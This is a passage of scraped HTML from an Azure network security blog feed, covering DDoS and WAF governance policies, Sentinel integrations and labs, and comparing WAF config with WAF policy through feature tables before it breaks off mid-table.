You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H2>&nbsp;</H2> <H2><SPAN style="color: #000080;">3.3&nbsp;&nbsp;&nbsp;&nbsp; Governance</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.1&nbsp;&nbsp;&nbsp; Built-in Azure Policies for Azure DDoS Protection Standard</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard should be enabled</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Public IP addresses should have resource logs enabled for Azure DDoS Protection Standard</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Virtual networks should be protected by Azure DDoS Protection Standard</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.2&nbsp;&nbsp;&nbsp; Built-in Azure Policies for Azure Web Application Firewall (WAF)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should be enabled for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should be enabled for Azure Front Door Service service</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should use the specified mode for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should use the specified mode for Azure Front Door Service</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.3&nbsp;&nbsp;&nbsp; Restrict creation of Azure DDoS Protection Standard plans with Azure Policy</SPAN></H3> <P style="padding-left: 30px;">If you are looking to prevent 
unplanned or unapproved costs associated with the creation of multiple DDoS plans within the same tenant, <A href="#" target="_blank" rel="noopener">check out this Azure Policy template</A>. This policy denies the creation of Azure DDoS Protection Standard plans on any subscriptions, except for the ones defined as allowed.</P> <P style="padding-left: 30px;">&nbsp;</P> <H2><SPAN style="color: #000080;">3.4&nbsp;&nbsp;&nbsp;&nbsp; Responding</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.4.1&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <P style="padding-left: 30px;">This <A href="#" target="_blank" rel="noopener">Logic App Playbook</A> for Sentinel will add the source IP address passed from the Sentinel Incident to a custom WAF rule blocking the IP. For a more comprehensive description of this use case, check our blog post <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">Integrating Azure Web Application Firewall with Azure Sentinel</A>.</P> <P style="padding-left: 30px;">&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.4.2&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">During an active attack, Azure DDoS Protection Standard customers have access to the <A href="#" target="_blank" rel="noopener">DDoS Rapid Response (DRR)</A> team, who can help with attack investigation during an attack and post-attack analysis.</P> <P style="padding-left: 30px;">This <A href="#" target="_blank" rel="noopener">DDoS Mitigation Alert Enrichment</A> template will alert administrators of a DDoS event, while adding essential information in the body of the email for a more detailed notification.</P> <P>&nbsp;</P> <H1>4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Integrations</H1> <P>&nbsp;</P> <P><STRONG>Using Azure Sentinel with 
Azure Web Application Firewall</STRONG></P> <P>You can <A href="#" target="_blank" rel="noopener">integrate Azure WAF with Azure Sentinel</A> for security information and event management (SIEM). By doing this, you can use Azure Sentinel’s security analytics, playbooks and workbooks with your WAF’s log data.</P> <P>In <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">this blog post</A>, we cover in further detail how to configure the log connector, query logs, generate incidents, and automate responses to incidents.</P> <P>&nbsp;</P> <P><STRONG>Using Azure Sentinel Solutions for Azure Firewall</STRONG></P> <P>The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response automation as packaged content. This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> <P>In <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746" target="_blank" rel="noopener">this blog post</A>, we cover in further detail how to automate detections and response for Azure Firewall events using Azure Sentinel.</P> <P>&nbsp;</P> <H1>5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Hands-on Labs</H1> <P>&nbsp;</P> <P>Network Security Demo lab: Azure pre-configured test deployment kit for POC is available in <A href="#" target="_blank" rel="noopener">this repository</A>. &nbsp;You can use this lab to validate Proof of Concepts for the different <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_blank" rel="noopener">Network</A> security products. 
You can find more information on setup and demo in the NetSec POC blog post.<BR /><BR /></P> <P><STRONG>WAF Attack test lab</STRONG>: Set up a Web Application Firewall lab environment to verify how you can identify, detect and protect against suspicious activities in your environment. This <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469" target="_blank" rel="noopener">blog post</A> provides steps to protect against potential attacks and you can <A href="#" target="_blank" rel="noopener">deploy the template from GitHub</A>.</P> <P>&nbsp;</P> <P><STRONG>Interactive Guide:</STRONG> If you cannot set up a lab environment, you can still get a hands-on experience with our&nbsp;<A href="#" target="_self">Azure network security interactive guide</A>. In this guide, we will show you how you can protect your cloud infrastructure with Azure network security tools.</P> <P>&nbsp;</P> <H1>6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Resource References</H1> <P>&nbsp;</P> <P>Register for upcoming webinars or watch recordings of past webinars in our Microsoft Security Community!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars</A></LI> </UL> <P>Check out, and be sure to contribute to, our Azure Network Security samples on GitHub!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/aznetsec</A></LI> </UL> <P>Check out our Azure Network Security blog posts in our Tech Community!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/aznetsecblog</A></LI> </UL> <P>Provide feedback and ideas about Azure products and features in our Azure Feedback portal!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/azurefeedback</A></LI> </UL> <P>&nbsp;</P> Wed, 06 Oct 2021 17:30:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-ninja-training/ba-p/2356101 
camilamartins 2021-10-06T17:30:47Z Azure Web Application Firewall: WAF config versus WAF policy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525 <P><STRONG><SPAN style="font-family: Calibri, sans-serif; font-size: 20px;">What is Web Application Firewall (WAF) config?</SPAN></STRONG></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">WAF config is the built-in method to configure WAF on Azure Application Gateway, and it is local to each individual Azure Application Gateway resource. When you create an Azure Application Gateway with either the WAF or the WAF_v2 SKU, you will see a new item on the menu blade called "Web application firewall" that displays WAF configuration options.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">The biggest drawback of using WAF config is that not all WAF settings are displayed in the portal UI. For example, you cannot configure or manage custom rules in the portal: you must use PowerShell or Azure CLI for that. Additionally, WAF config is a setting within an Azure Application Gateway resource. For this reason, each WAF config must be managed individually, and its configuration applies globally for everything within that specific Azure Application Gateway resource. 
WAF config does not exist on Azure Front Door.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF config on Azure Application Gateway</EM></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="wafconfig.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272525i67CB96478E353891/image-size/large?v=v2&amp;px=999" role="button" title="wafconfig.png" alt="wafconfig.png" /></span></EM></SPAN></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What is WAF policy?</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">WAF policy is a standalone resource type. It is not a built-in configuration within the Azure Application Gateway resource. A WAF policy is managed independently, and it can be attached to either Azure Application Gateway or Azure Front Door resources. When checking the "Web application firewall" option on the menu blade for Azure Application Gateway or Azure Front Door, you will notice that it simply displays a link to the attached WAF policy, rather than the full WAF configuration settings.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-family: Calibri, sans-serif; font-size: 17px;">A benefit of using WAF policy for Azure Application Gateway or Azure Front Door is that all generally available WAF settings exist in the portal UI, such as exclusions, custom rules, managed rules and more. You can configure and visualize the WAF policy settings in the portal, in addition to PowerShell and Azure CLI. Another useful benefit of WAF policy when it comes to Azure Application Gateway is that it offers more granularity in scope. 
You can associate a WAF policy at a global level by assigning it to an Azure Application Gateway resource, at a website level by assigning it to an HTTP listener, or even at a URI level by assigning it to a specific route path. For example, you could use a global WAF policy to apply the baseline security controls that meet your organization's security policy and attach it to all your Azure Application Gateways. From there, based on individual application needs, you can apply a different WAF policy that contains more (or less) strict security controls at a website level or at a URI level.</SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM>Would you like more information on different WAF policy association levels for Azure Application Gateway? Refer to our <A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF) policy overview</A> documentation.</EM></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF policy on Azure Application Gateway</EM></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="wafpolappgw.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272526i0DF5AF211139791E/image-size/large?v=v2&amp;px=999" role="button" title="wafpolappgw.png" alt="wafpolappgw.png" /></span></EM></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF policy on Azure Front Door</EM></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="wafpolafd.png" 
style="width: 995px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272527i47AC90EBE21462DE/image-size/large?v=v2&amp;px=999" role="button" title="wafpolafd.png" alt="wafpolafd.png" /></span>&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What types of rules are available in Azure WAF?</STRONG></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>1. Azure-managed rule sets</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">The Azure-managed rule sets for Azure WAF on Azure Application Gateway and Azure Front Door are based on <A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set (CRS)</A>. This set of rules protects your web applications against most of the top 10 OWASP web application security threats, such as SQL injection and cross-site scripting.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Application Gateway, you will see the managed rule sets represented as OWASP_3.2 (Preview), OWASP_3.1, OWASP_3.0, and OWASP_2.2.9. Here, the Azure WAF uses the <A href="#" target="_blank" rel="noopener">anomaly scoring mode</A>, which means all rules in these rule sets are evaluated for each request, and the request is only blocked when the anomaly scoring threshold is reached.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Front Door, you will see the managed rule sets represented as Microsoft_DefaultRuleSet_1.1 and DefaultRuleSet_1.0. The Microsoft_DefaultRuleSet_1.1 rule set includes Microsoft-authored rules in addition to the rules based on OWASP ModSecurity CRS. 
In this case, Azure WAF uses the traditional mode, which means that as soon as there is a rule match the WAF stops processing all other subsequent rules.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Azure-managed rule sets for Azure WAF on Azure Application Gateway</A>&nbsp;</SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Azure-managed rule sets for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>2. Bot protection rule sets</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Bot protection rule sets provide safety against bots doing scraping, scanning, and looking for vulnerabilities in your web application. These rule sets are powered by our own Microsoft Threat Intelligence feed, which is used by multiple Azure services, including Azure Firewall and Azure Security Center.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Application Gateway, you will see the bot protection rule set represented as Microsoft_BotManagerRuleSet_0.1. This rule set can detect known bad bots based on IP reputation.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Front Door, you will see the bot protection rule set represented as Microsoft_BotManagerRuleSet_1.0. 
This rule set can detect bad bots, good bots, and unknown bots based on IP reputation, user-agent headers, and other indicators that compose signatures managed by Microsoft.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Bot protection rule set for Azure WAF on Azure Application Gateway</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Bot protection rule sets for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>3. Custom rules</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Azure WAF provides the ability to create custom rules. This allows you to either fine-tune your WAF policy or create rules with specific logic to address your unique application requirements. The rule conditions can be based on many variables, such as IPs, geolocation, request URIs, post arguments, and more. 
Custom rules can trigger based on a simple match for Azure WAF on Azure Application Gateway and Azure Front Door, or additionally, they can trigger based on rate-limiting thresholds for Azure WAF on Azure Front Door.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">If you’d like to see some WAF custom rule examples, check out our blog post on <A href="#" target="_blank" rel="noopener">Azure WAF Custom Rule Samples and Use Cases</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Custom rules for Azure WAF on Azure Application Gateway</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Custom rules for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What are the feature distinctions between WAF config and WAF policy?</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">As you can see based on the information we have shared thus far, there are a few important differences between the capabilities of WAF depending on the associated resource type. 
You can consult these tables to get a quick comparison and make an informed decision when deploying Azure WAF.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In the table below, we’re sharing the feature availability on WAF config for Azure Application Gateway WAF and WAF_v2 SKUs.</SPAN></SPAN></P> <P>&nbsp;</P> <TABLE style="width: 100.0%; border-collapse: collapse;"> <TBODY> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF Config Features</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF SKU</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF_v2 SKU</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.2 (Preview)</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; 
padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.1</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.0</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, 
sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_2.2.9</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Microsoft_BotManagerRuleSet_0.1</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; 
border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Geo-Location Rules</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Site Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Uri Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD 
style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In the table below, we are detailing the feature availability on WAF policy for Azure Application Gateway WAF_v2 and Azure Front Door. Note that WAF policy cannot be used with Azure Application Gateway WAF SKU.</SPAN></SPAN></P> <P>&nbsp;</P> <TABLE style="width: 100.0%; border-collapse: collapse;"> <TBODY> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF Policy&nbsp;Features</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Azure Application Gateway (WAF_v2 SKU)</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Azure Front Door</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; 
border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP-Based Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Microsoft-Authored Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Bot Protection Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD 
